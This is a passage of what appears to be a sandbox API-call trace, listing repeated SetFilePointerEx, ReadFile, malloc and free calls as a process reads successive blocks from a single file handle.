lpBuffer=0x208cd20, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208cca0, lpOverlapped=0x0 | out: lpBuffer=0x208cd20*, lpNumberOfBytesRead=0x208cca0*=0x1e, lpOverlapped=0x0) returned 1 [0113.735] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x20ca9, lpNewFilePointer=0x208cd30, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208cd30*=134313) returned 1 [0113.735] ReadFile (in: hFile=0x2d0, lpBuffer=0x208ce40, nNumberOfBytesToRead=0x118, lpNumberOfBytesRead=0x208cd00, lpOverlapped=0x0 | out: lpBuffer=0x208ce40*, lpNumberOfBytesRead=0x208cd00*=0x118, lpOverlapped=0x0) returned 1 [0113.736] malloc (_Size=0x48) returned 0x12ef2fc0 [0113.736] malloc (_Size=0x34) returned 0x12ef43d0 [0113.736] free (_Block=0x12ef2d40) [0113.736] free (_Block=0x12ef2cf0) [0113.739] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x20dd1, lpNewFilePointer=0x208ccd0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208ccd0*=134609) returned 1 [0113.739] ReadFile (in: hFile=0x2d0, lpBuffer=0x208cd20, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208cca0, lpOverlapped=0x0 | out: lpBuffer=0x208cd20*, lpNumberOfBytesRead=0x208cca0*=0x1e, lpOverlapped=0x0) returned 1 [0113.739] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x20e22, lpNewFilePointer=0x208cd30, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208cd30*=134690) returned 1 [0113.739] ReadFile (in: hFile=0x2d0, lpBuffer=0x208ce40, nNumberOfBytesToRead=0x337, lpNumberOfBytesRead=0x208cd00, lpOverlapped=0x0 | out: lpBuffer=0x208ce40*, lpNumberOfBytesRead=0x208cd00*=0x337, lpOverlapped=0x0) returned 1 [0113.740] malloc (_Size=0x48) returned 0x12ef2cf0 [0113.740] malloc (_Size=0x32) returned 0x12ef4410 [0113.740] free (_Block=0x12ef43d0) [0113.740] free (_Block=0x12ef2fc0) [0113.742] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x21169, lpNewFilePointer=0x208ccd0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208ccd0*=135529) returned 1 [0113.742] ReadFile (in: hFile=0x2d0, lpBuffer=0x208cd20, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208cca0, lpOverlapped=0x0 | out: lpBuffer=0x208cd20*, lpNumberOfBytesRead=0x208cca0*=0x1e, lpOverlapped=0x0) returned 1 [0113.742] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x211b8, lpNewFilePointer=0x208cd30, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208cd30*=135608) returned 1 [0113.742] ReadFile (in: hFile=0x2d0, lpBuffer=0x208ce40, nNumberOfBytesToRead=0x11a, lpNumberOfBytesRead=0x208cd00, lpOverlapped=0x0 | out: lpBuffer=0x208ce40*, lpNumberOfBytesRead=0x208cd00*=0x11a, lpOverlapped=0x0) returned 1 [0113.743] malloc (_Size=0x48) returned 0x12ef2d40 [0113.743] malloc (_Size=0x2c) returned 0x12ef43d0 [0113.744] free (_Block=0x12ef4410) [0113.744] free (_Block=0x12ef2cf0) [0113.746] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x212e2, lpNewFilePointer=0x208ccd0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208ccd0*=135906) returned 1 [0113.746] ReadFile (in: hFile=0x2d0, lpBuffer=0x208cd20, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208cca0, lpOverlapped=0x0 | out: lpBuffer=0x208cd20*, lpNumberOfBytesRead=0x208cca0*=0x1e, lpOverlapped=0x0) returned 1 [0113.746] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x2132b, lpNewFilePointer=0x208cd30, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208cd30*=135979) returned 1 [0113.746] ReadFile (in: hFile=0x2d0, lpBuffer=0x208ce40, nNumberOfBytesToRead=0x418, lpNumberOfBytesRead=0x208cd00, lpOverlapped=0x0 | out: lpBuffer=0x208ce40*, lpNumberOfBytesRead=0x208cd00*=0x418, lpOverlapped=0x0) returned 1 [0113.747] malloc (_Size=0x48) returned 0x12ef2cf0 [0113.747] malloc (_Size=0x35) returned 0x12ef4410 [0113.747] free (_Block=0x12ef43d0) [0113.747] free (_Block=0x12ef2d40) [0113.749] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x21753, lpNewFilePointer=0x208ccd0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208ccd0*=137043) returned 1 [0113.749] ReadFile (in: hFile=0x2d0, lpBuffer=0x208cd20, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208cca0, lpOverlapped=0x0 | out: lpBuffer=0x208cd20*, lpNumberOfBytesRead=0x208cca0*=0x1e, lpOverlapped=0x0) returned 1 [0113.749] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x217a5, lpNewFilePointer=0x208cd30, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208cd30*=137125) returned 1 [0113.749] ReadFile (in: hFile=0x2d0, lpBuffer=0x208ce40, nNumberOfBytesToRead=0x588, lpNumberOfBytesRead=0x208cd00, lpOverlapped=0x0 | out: lpBuffer=0x208ce40*, lpNumberOfBytesRead=0x208cd00*=0x588, lpOverlapped=0x0) returned 1 [0113.750] malloc (_Size=0x48) returned 0x12ef2d40 [0113.750] malloc (_Size=0x2c) returned 0x12ef43d0 [0113.751] free (_Block=0x12ef4410) [0113.751] free (_Block=0x12ef2cf0) [0113.754] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x21d3d, lpNewFilePointer=0x208ccd0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208ccd0*=138557) returned 1 [0113.754] ReadFile (in: hFile=0x2d0, lpBuffer=0x208cd20, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208cca0, lpOverlapped=0x0 | out: lpBuffer=0x208cd20*, lpNumberOfBytesRead=0x208cca0*=0x1e, lpOverlapped=0x0) returned 1 [0113.754] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x21d86, lpNewFilePointer=0x208cd30, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208cd30*=138630) returned 1 [0113.754] ReadFile (in: hFile=0x2d0, lpBuffer=0x208ce40, nNumberOfBytesToRead=0x2000, lpNumberOfBytesRead=0x208cd00, lpOverlapped=0x0 | out: lpBuffer=0x208ce40*, lpNumberOfBytesRead=0x208cd00*=0x2000, lpOverlapped=0x0) returned 1 [0113.755] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x23d86, lpNewFilePointer=0x208ccc0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208ccc0*=146822) returned 1 [0113.755] ReadFile (in: hFile=0x2d0, lpBuffer=0x208cdd0, nNumberOfBytesToRead=0xc72, lpNumberOfBytesRead=0x208cc90, lpOverlapped=0x0 | out: lpBuffer=0x208cdd0*, lpNumberOfBytesRead=0x208cc90*=0xc72, lpOverlapped=0x0) returned 1 [0113.759] malloc (_Size=0x48) returned 0x12ef2cf0 [0113.759] malloc (_Size=0x43) returned 0x12ef2fc0 [0113.760] free (_Block=0x12ef43d0) [0113.761] free (_Block=0x12ef2d40) [0113.768] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x24a08, lpNewFilePointer=0x208ccd0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208ccd0*=150024) returned 1 [0113.768] ReadFile (in: hFile=0x2d0, lpBuffer=0x208cd20, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208cca0, lpOverlapped=0x0 | out: lpBuffer=0x208cd20*, lpNumberOfBytesRead=0x208cca0*=0x1e, lpOverlapped=0x0) returned 1 [0113.768] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x24a68, lpNewFilePointer=0x208cd30, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208cd30*=150120) returned 1 [0113.768] ReadFile (in: hFile=0x2d0, lpBuffer=0x208ce40, nNumberOfBytesToRead=0x2a7, lpNumberOfBytesRead=0x208cd00, lpOverlapped=0x0 | out: lpBuffer=0x208ce40*, lpNumberOfBytesRead=0x208cd00*=0x2a7, lpOverlapped=0x0) returned 1 [0113.770] malloc (_Size=0x48) returned 0x12ef2d40 [0113.770] malloc (_Size=0x34) returned 0x12ef4490 [0113.770] free (_Block=0x12ef2fc0) [0113.771] free (_Block=0x12ef2cf0) [0113.772] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x24d1f, lpNewFilePointer=0x208cce0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208cce0*=150815) returned 1 [0113.772] ReadFile (in: hFile=0x2d0, lpBuffer=0x208cd30, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208ccb0, lpOverlapped=0x0 | out: lpBuffer=0x208cd30*, lpNumberOfBytesRead=0x208ccb0*=0x1e, lpOverlapped=0x0) returned 1 [0113.772] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x24d70, lpNewFilePointer=0x208cd40, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208cd40*=150896) returned 1 [0113.772] ReadFile (in: hFile=0x2d0, lpBuffer=0x208ce50, nNumberOfBytesToRead=0xe5, lpNumberOfBytesRead=0x208cd10, lpOverlapped=0x0 | out: lpBuffer=0x208ce50*, lpNumberOfBytesRead=0x208cd10*=0xe5, lpOverlapped=0x0) returned 1 [0113.774] malloc (_Size=0x48) returned 0x12ef2fc0 [0113.774] malloc (_Size=0x28) returned 0x12ef1410 [0113.775] free (_Block=0x12ef4490) [0113.775] free (_Block=0x12ef2d40) [0113.776] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x24e65, lpNewFilePointer=0x208cce0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208cce0*=151141) returned 1 [0113.776] ReadFile (in: hFile=0x2d0, lpBuffer=0x208cd30, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208ccb0, lpOverlapped=0x0 | out: lpBuffer=0x208cd30*, lpNumberOfBytesRead=0x208ccb0*=0x1e, lpOverlapped=0x0) returned 1 [0113.776] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x24eaa, lpNewFilePointer=0x208cd40, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208cd40*=151210) returned 1 [0113.776] ReadFile (in: hFile=0x2d0, lpBuffer=0x208ce50, nNumberOfBytesToRead=0x61e, lpNumberOfBytesRead=0x208cd10, lpOverlapped=0x0 | out: lpBuffer=0x208ce50*, lpNumberOfBytesRead=0x208cd10*=0x61e, lpOverlapped=0x0) returned 1 [0113.780] malloc (_Size=0x48) returned 0x12ef2cf0 [0113.780] malloc (_Size=0x32) returned 0x12ef43d0 [0113.780] free (_Block=0x12ef1410) [0113.780] free (_Block=0x12ef2fc0) [0113.782] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x254d8, lpNewFilePointer=0x208cce0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208cce0*=152792) returned 1 [0113.782] ReadFile (in: hFile=0x2d0, lpBuffer=0x208cd30, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208ccb0, lpOverlapped=0x0 | out: lpBuffer=0x208cd30*, lpNumberOfBytesRead=0x208ccb0*=0x1e, lpOverlapped=0x0) returned 1 [0113.782] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x25527, lpNewFilePointer=0x208cd40, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208cd40*=152871) returned 1 [0113.782] ReadFile (in: hFile=0x2d0, lpBuffer=0x208ce50, nNumberOfBytesToRead=0x44e, lpNumberOfBytesRead=0x208cd10, lpOverlapped=0x0 | out: lpBuffer=0x208ce50*, lpNumberOfBytesRead=0x208cd10*=0x44e, lpOverlapped=0x0) returned 1 [0113.783] malloc (_Size=0x48) returned 0x12ef2d40 [0113.783] malloc (_Size=0x43) returned 0x12ef2fc0 [0113.784] free (_Block=0x12ef43d0) [0113.784] free (_Block=0x12ef2cf0) [0113.786] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x25985, lpNewFilePointer=0x208cce0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208cce0*=153989) returned 1 [0113.786] ReadFile (in: hFile=0x2d0, lpBuffer=0x208cd30, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208ccb0, lpOverlapped=0x0 | out: lpBuffer=0x208cd30*, lpNumberOfBytesRead=0x208ccb0*=0x1e, lpOverlapped=0x0) returned 1 [0113.786] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x259e5, lpNewFilePointer=0x208cd40, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208cd40*=154085) returned 1 [0113.786] ReadFile (in: hFile=0x2d0, lpBuffer=0x208ce50, nNumberOfBytesToRead=0x138, lpNumberOfBytesRead=0x208cd10, lpOverlapped=0x0 | out: lpBuffer=0x208ce50*, lpNumberOfBytesRead=0x208cd10*=0x138, lpOverlapped=0x0) returned 1 [0113.787] malloc (_Size=0x48) returned 0x12ef2cf0 [0113.787] malloc (_Size=0x3b) returned 0x12ed3fc0 [0113.788] free (_Block=0x12ef2fc0) [0113.788] free (_Block=0x12ef2d40) [0113.789] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x25b2d, lpNewFilePointer=0x208cce0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208cce0*=154413) returned 1 [0113.789] ReadFile (in: hFile=0x2d0, lpBuffer=0x208cd30, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208ccb0, lpOverlapped=0x0 | out: lpBuffer=0x208cd30*, lpNumberOfBytesRead=0x208ccb0*=0x1e, lpOverlapped=0x0) returned 1 [0113.789] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x25b85, lpNewFilePointer=0x208cd40, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208cd40*=154501) returned 1 [0113.789] ReadFile (in: hFile=0x2d0, lpBuffer=0x208ce50, nNumberOfBytesToRead=0x14a, lpNumberOfBytesRead=0x208cd10, lpOverlapped=0x0 | out: lpBuffer=0x208ce50*, lpNumberOfBytesRead=0x208cd10*=0x14a, lpOverlapped=0x0) returned 1 [0113.791] malloc (_Size=0x48) returned 0x12ed3840 [0113.791] malloc (_Size=0x32) returned 0x12ef43d0 [0113.792] free (_Block=0x12ed3fc0) [0113.792] free (_Block=0x12ef2cf0) [0113.793] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x25cdf, lpNewFilePointer=0x208cce0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208cce0*=154847) returned 1 [0113.793] ReadFile (in: hFile=0x2d0, lpBuffer=0x208cd30, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208ccb0, lpOverlapped=0x0 | out: lpBuffer=0x208cd30*, lpNumberOfBytesRead=0x208ccb0*=0x1e, lpOverlapped=0x0) returned 1 [0113.793] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x25d2e, lpNewFilePointer=0x208cd40, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208cd40*=154926) returned 1 [0113.793] ReadFile (in: hFile=0x2d0, lpBuffer=0x208ce50, nNumberOfBytesToRead=0x169, lpNumberOfBytesRead=0x208cd10, lpOverlapped=0x0 | out: lpBuffer=0x208ce50*, lpNumberOfBytesRead=0x208cd10*=0x169, lpOverlapped=0x0) returned 1 [0113.794] malloc (_Size=0x48) returned 0x12ed3fc0 [0113.794] malloc (_Size=0x27) returned 0x12ef14d0 [0113.794] free (_Block=0x12ef43d0) [0113.795] free (_Block=0x12ed3840) [0113.796] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x25ea7, lpNewFilePointer=0x208cce0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208cce0*=155303) returned 1 [0113.796] ReadFile (in: hFile=0x2d0, lpBuffer=0x208cd30, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208ccb0, lpOverlapped=0x0 | out: lpBuffer=0x208cd30*, lpNumberOfBytesRead=0x208ccb0*=0x1e, lpOverlapped=0x0) returned 1 [0113.796] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x25eeb, lpNewFilePointer=0x208cd40, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208cd40*=155371) returned 1 [0113.796] ReadFile (in: hFile=0x2d0, lpBuffer=0x208ce50, nNumberOfBytesToRead=0x1217, lpNumberOfBytesRead=0x208cd10, lpOverlapped=0x0 | out: lpBuffer=0x208ce50*, lpNumberOfBytesRead=0x208cd10*=0x1217, lpOverlapped=0x0) returned 1 [0113.798] malloc (_Size=0x48) returned 0x12ed3840 [0113.798] malloc (_Size=0x34) returned 0x12ef43d0 [0113.798] free (_Block=0x12ef14d0) [0113.798] free (_Block=0x12ed3fc0) [0113.800] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x27112, lpNewFilePointer=0x208cce0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208cce0*=160018) returned 1 [0113.800] ReadFile (in: hFile=0x2d0, lpBuffer=0x208cd30, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208ccb0, lpOverlapped=0x0 | out: lpBuffer=0x208cd30*, lpNumberOfBytesRead=0x208ccb0*=0x1e, lpOverlapped=0x0) returned 1 [0113.800] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x27163, lpNewFilePointer=0x208cd40, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208cd40*=160099) returned 1 [0113.800] ReadFile (in: hFile=0x2d0, lpBuffer=0x208ce50, nNumberOfBytesToRead=0x172, lpNumberOfBytesRead=0x208cd10, lpOverlapped=0x0 | out: lpBuffer=0x208ce50*, lpNumberOfBytesRead=0x208cd10*=0x172, lpOverlapped=0x0) returned 1 [0113.802] malloc (_Size=0x48) returned 0x12ed3fc0 [0113.802] malloc (_Size=0x41) returned 0x12ef2cf0 [0113.803] free (_Block=0x12ef43d0) [0113.803] free (_Block=0x12ed3840) [0113.806] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x272e5, lpNewFilePointer=0x208ccc0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208ccc0*=160485) returned 1 [0113.806] ReadFile (in: hFile=0x2d0, lpBuffer=0x208cd10, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208cc90, lpOverlapped=0x0 | out: lpBuffer=0x208cd10*, lpNumberOfBytesRead=0x208cc90*=0x1e, lpOverlapped=0x0) returned 1 [0113.806] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x27343, lpNewFilePointer=0x208cd20, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208cd20*=160579) returned 1 [0113.806] ReadFile (in: hFile=0x2d0, lpBuffer=0x208ce30, nNumberOfBytesToRead=0x10f, lpNumberOfBytesRead=0x208ccf0, lpOverlapped=0x0 | out: lpBuffer=0x208ce30*, lpNumberOfBytesRead=0x208ccf0*=0x10f, lpOverlapped=0x0) returned 1 [0113.807] malloc (_Size=0x48) returned 0x12ef2d40 [0113.807] malloc (_Size=0x2b) returned 0x12ef43d0 [0113.808] free (_Block=0x12ef2cf0) [0113.808] free (_Block=0x12ed3fc0) [0113.810] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x27462, lpNewFilePointer=0x208cca0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208cca0*=160866) returned 1 [0113.810] ReadFile (in: hFile=0x2d0, lpBuffer=0x208ccf0, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208cc70, lpOverlapped=0x0 | out: lpBuffer=0x208ccf0*, lpNumberOfBytesRead=0x208cc70*=0x1e, lpOverlapped=0x0) returned 1 [0113.810] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x274aa, lpNewFilePointer=0x208cd00, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208cd00*=160938) returned 1 [0113.810] ReadFile (in: hFile=0x2d0, lpBuffer=0x208ce10, nNumberOfBytesToRead=0x6ea, lpNumberOfBytesRead=0x208ccd0, lpOverlapped=0x0 | out: lpBuffer=0x208ce10*, lpNumberOfBytesRead=0x208ccd0*=0x6ea, lpOverlapped=0x0) returned 1 [0113.813] malloc (_Size=0x48) returned 0x12ef2cf0 [0113.813] malloc (_Size=0x2b) returned 0x12ef4410 [0113.813] free (_Block=0x12ef43d0) [0113.813] free (_Block=0x12ef2d40) [0113.815] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x27ba4, lpNewFilePointer=0x208cca0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208cca0*=162724) returned 1 [0113.815] ReadFile (in: hFile=0x2d0, lpBuffer=0x208ccf0, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208cc70, lpOverlapped=0x0 | out: lpBuffer=0x208ccf0*, lpNumberOfBytesRead=0x208cc70*=0x1e, lpOverlapped=0x0) returned 1 [0113.815] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x27bec, lpNewFilePointer=0x208cd00, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208cd00*=162796) returned 1 [0113.815] ReadFile (in: hFile=0x2d0, lpBuffer=0x208ce10, nNumberOfBytesToRead=0x2ca, lpNumberOfBytesRead=0x208ccd0, lpOverlapped=0x0 | out: lpBuffer=0x208ce10*, lpNumberOfBytesRead=0x208ccd0*=0x2ca, lpOverlapped=0x0) returned 1 [0113.816] malloc (_Size=0x48) returned 0x12ef2fc0 [0113.816] malloc (_Size=0x51) returned 0x12ee9740 [0113.817] free (_Block=0x12ef4410) [0113.817] free (_Block=0x12ef2cf0) [0113.819] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x27ec6, lpNewFilePointer=0x208cca0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208cca0*=163526) returned 1 [0113.819] ReadFile (in: hFile=0x2d0, lpBuffer=0x208ccf0, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208cc70, lpOverlapped=0x0 | out: lpBuffer=0x208ccf0*, lpNumberOfBytesRead=0x208cc70*=0x1e, lpOverlapped=0x0) returned 1 [0113.819] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x27f34, lpNewFilePointer=0x208cd00, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208cd00*=163636) returned 1 [0113.819] ReadFile (in: hFile=0x2d0, lpBuffer=0x208ce10, nNumberOfBytesToRead=0x47d, lpNumberOfBytesRead=0x208ccd0, lpOverlapped=0x0 | out: lpBuffer=0x208ce10*, lpNumberOfBytesRead=0x208ccd0*=0x47d, lpOverlapped=0x0) returned 1 [0113.821] malloc (_Size=0x48) returned 0x12ef2cf0 [0113.821] malloc (_Size=0x48) returned 0x12ef2d40 [0113.823] free (_Block=0x12ee9740) [0113.823] free (_Block=0x12ef2fc0) [0113.824] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x283c1, lpNewFilePointer=0x208cca0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208cca0*=164801) returned 1 [0113.824] ReadFile (in: hFile=0x2d0, lpBuffer=0x208ccf0, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208cc70, lpOverlapped=0x0 | out: lpBuffer=0x208ccf0*, lpNumberOfBytesRead=0x208cc70*=0x1e, lpOverlapped=0x0) returned 1 [0113.824] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x28426, lpNewFilePointer=0x208cd00, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208cd00*=164902) returned 1 [0113.824] ReadFile (in: hFile=0x2d0, lpBuffer=0x208ce10, nNumberOfBytesToRead=0x116, lpNumberOfBytesRead=0x208ccd0, lpOverlapped=0x0 | out: lpBuffer=0x208ce10*, lpNumberOfBytesRead=0x208ccd0*=0x116, lpOverlapped=0x0) returned 1 [0113.825] malloc (_Size=0x48) returned 0x12ef2fc0 [0113.825] malloc (_Size=0x2a) returned 0x12ef43d0 [0113.826] free (_Block=0x12ef2d40) [0113.826] free (_Block=0x12ef2cf0) [0113.828] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x2854c, lpNewFilePointer=0x208cca0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208cca0*=165196) returned 1 [0113.828] ReadFile (in: hFile=0x2d0, lpBuffer=0x208ccf0, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208cc70, lpOverlapped=0x0 | out: lpBuffer=0x208ccf0*, lpNumberOfBytesRead=0x208cc70*=0x1e, lpOverlapped=0x0) returned 1 [0113.828] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x28593, lpNewFilePointer=0x208cd00, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208cd00*=165267) returned 1 [0113.828] ReadFile (in: hFile=0x2d0, lpBuffer=0x208ce10, nNumberOfBytesToRead=0x424, lpNumberOfBytesRead=0x208ccd0, lpOverlapped=0x0 | out: lpBuffer=0x208ce10*, lpNumberOfBytesRead=0x208ccd0*=0x424, lpOverlapped=0x0) returned 1 [0113.830] malloc (_Size=0x48) returned 0x12ef2cf0 [0113.830] malloc (_Size=0x34) returned 0x12ef4410 [0113.830] free (_Block=0x12ef43d0) [0113.831] free (_Block=0x12ef2fc0) [0113.832] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x289c7, lpNewFilePointer=0x208cca0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208cca0*=166343) returned 1 [0113.833] ReadFile (in: hFile=0x2d0, lpBuffer=0x208ccf0, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208cc70, lpOverlapped=0x0 | out: lpBuffer=0x208ccf0*, lpNumberOfBytesRead=0x208cc70*=0x1e, lpOverlapped=0x0) returned 1 [0113.833] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x28a18, lpNewFilePointer=0x208cd00, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208cd00*=166424) returned 1 [0113.833] ReadFile (in: hFile=0x2d0, lpBuffer=0x208ce10, nNumberOfBytesToRead=0xf4, lpNumberOfBytesRead=0x208ccd0, lpOverlapped=0x0 | out: lpBuffer=0x208ce10*, lpNumberOfBytesRead=0x208ccd0*=0xf4, lpOverlapped=0x0) returned 1 [0113.834] malloc (_Size=0x48) returned 0x12ef2d40 [0113.834] malloc (_Size=0x30) returned 0x12ef43d0 [0113.835] free (_Block=0x12ef4410) [0113.835] free (_Block=0x12ef2cf0) [0113.836] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x28b1c, lpNewFilePointer=0x208cca0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208cca0*=166684) returned 1 [0113.840] ReadFile (in: hFile=0x2d0, lpBuffer=0x208ccf0, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208cc70, lpOverlapped=0x0 | out: lpBuffer=0x208ccf0*, lpNumberOfBytesRead=0x208cc70*=0x1e, lpOverlapped=0x0) returned 1 [0113.840] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x28b69, lpNewFilePointer=0x208cd00, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208cd00*=166761) returned 1 [0113.840] ReadFile (in: hFile=0x2d0, lpBuffer=0x208ce10, nNumberOfBytesToRead=0xbe, lpNumberOfBytesRead=0x208ccd0, lpOverlapped=0x0 | out: lpBuffer=0x208ce10*, lpNumberOfBytesRead=0x208ccd0*=0xbe, lpOverlapped=0x0) returned 1 [0113.841] malloc (_Size=0x48) returned 0x12ef2fc0 [0113.841] malloc (_Size=0x3d) returned 0x12ef2cf0 [0113.842] free (_Block=0x12ef43d0) [0113.842] free (_Block=0x12ef2d40) [0113.844] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x28c37, lpNewFilePointer=0x208cca0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208cca0*=166967) returned 1 [0113.844] ReadFile (in: hFile=0x2d0, lpBuffer=0x208ccf0, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208cc70, lpOverlapped=0x0 | out: lpBuffer=0x208ccf0*, lpNumberOfBytesRead=0x208cc70*=0x1e, lpOverlapped=0x0) returned 1 [0113.844] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x28c91, lpNewFilePointer=0x208cd00, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208cd00*=167057) returned 1 [0113.844] ReadFile (in: hFile=0x2d0, lpBuffer=0x208ce10, nNumberOfBytesToRead=0x128, lpNumberOfBytesRead=0x208ccd0, lpOverlapped=0x0 | out: lpBuffer=0x208ce10*, lpNumberOfBytesRead=0x208ccd0*=0x128, lpOverlapped=0x0) returned 1 [0113.845] malloc (_Size=0x48) returned 0x12ef2d40 [0113.845] malloc (_Size=0x46) returned 0x12ed3840 [0113.846] free (_Block=0x12ef2cf0) [0113.846] free (_Block=0x12ef2fc0) [0113.847] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x28dc9, lpNewFilePointer=0x208cca0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208cca0*=167369) returned 1 [0113.847] ReadFile (in: hFile=0x2d0, lpBuffer=0x208ccf0, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208cc70, lpOverlapped=0x0 | out: lpBuffer=0x208ccf0*, lpNumberOfBytesRead=0x208cc70*=0x1e, lpOverlapped=0x0) returned 1 [0113.847] SetFilePointerEx (in: hFile=0x2d0, 